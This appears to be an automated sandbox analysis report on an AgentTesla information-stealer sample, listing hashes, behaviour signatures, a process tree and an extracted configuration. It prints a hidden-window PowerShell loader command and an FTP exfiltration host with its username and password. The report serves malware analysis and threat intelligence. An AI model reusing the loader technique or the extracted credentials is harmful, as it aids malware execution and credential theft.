Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-09-2024 19:00
Static task
static1
Behavioral task
behavioral1
Sample
Documentidispedizione0002838844.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Documentidispedizione0002838844.exe
Resource
win10v2004-20240802-en
General
-
Target
Documentidispedizione0002838844.exe
-
Size
695KB
-
MD5
2505793cd3edee5e7ceab9359a8a74ba
-
SHA1
30437e6082392072f27fd3609e6aac5d161c45a8
-
SHA256
8cce7f3f93f7d317da18beb13332f1ad601c4552022d07d7e28d1d836eedba81
-
SHA512
58f4dd9082ed1b7721030f1f7ac74bdb7878153081839d13ebf0027ea9d47cfb198d9cad97645b915a981442716979b7ef48e751e13f69f0a7bcf7e0aab2a2ba
-
SSDEEP
6144:JpkXchsEnW7+8WIEZb8Qj+iHK5sDlK+f+gsw8XuMEbHdLP7LoMg//YgNfegoWK2E:YvWIKbnKiHEsM60Z/Y8emeFFwP0nRUq
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
ro}UWgz#!38E
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3816 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 api.ipify.org 24 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3600 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3816 powershell.exe 3600 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3816 set thread context of 3600 3816 powershell.exe 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Documentidispedizione0002838844.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 3816 powershell.exe 3600 wab.exe 3600 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3816 powershell.exe Token: SeDebugPrivilege 3600 wab.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 672 wrote to memory of 3816 672 Documentidispedizione0002838844.exe 84 PID 672 wrote to memory of 3816 672 Documentidispedizione0002838844.exe 84 PID 672 wrote to memory of 3816 672 Documentidispedizione0002838844.exe 84 PID 3816 wrote to memory of 3600 3816 powershell.exe 95 PID 3816 wrote to memory of 3600 3816 powershell.exe 95 PID 3816 wrote to memory of 3600 3816 powershell.exe 95 PID 3816 wrote to memory of 3600 3816 powershell.exe 95 PID 3816 wrote to memory of 3600 3816 powershell.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\Documentidispedizione0002838844.exe"C:\Users\Admin\AppData\Local\Temp\Documentidispedizione0002838844.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$sharping=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Segment.Sam';$qatars=$sharping.SubString(43606,3);.$qatars($sharping)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
314KB
MD52b5e89cf7067591109b0a73fa6d9973d
SHA1e924969e07bd57b5c6ac1a4a1d20928b666804a0
SHA256ef05ff4d95cfb33089e1d6aede4157989fee552e6e0e59fd653300876bc32d14
SHA51211905db895f3b2a764fa96d4b01ff18d29032b36ac1da1312e6e0f20749c8287f552b26a37f4e054041081c341b8c472b90bf7185c04b2fc61b88b23427c11a7
-
Filesize
53KB
MD5bc4900725d3d13feb8409643ec5b42a8
SHA113e40afed666594caf9bfee6f07f4bc9039c04e7
SHA2566741b125848e3a2ec6665e467bf819de8d9dd0a7cddd5642bcc64f6acadd8dc8
SHA512732b2751117b41979c216685aa4211453e180c641fa85cac2a76ce56e802734a3257dddd3731c5801c0c1063ed933f9e89be7a956b586051cde5d3ff940518d1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82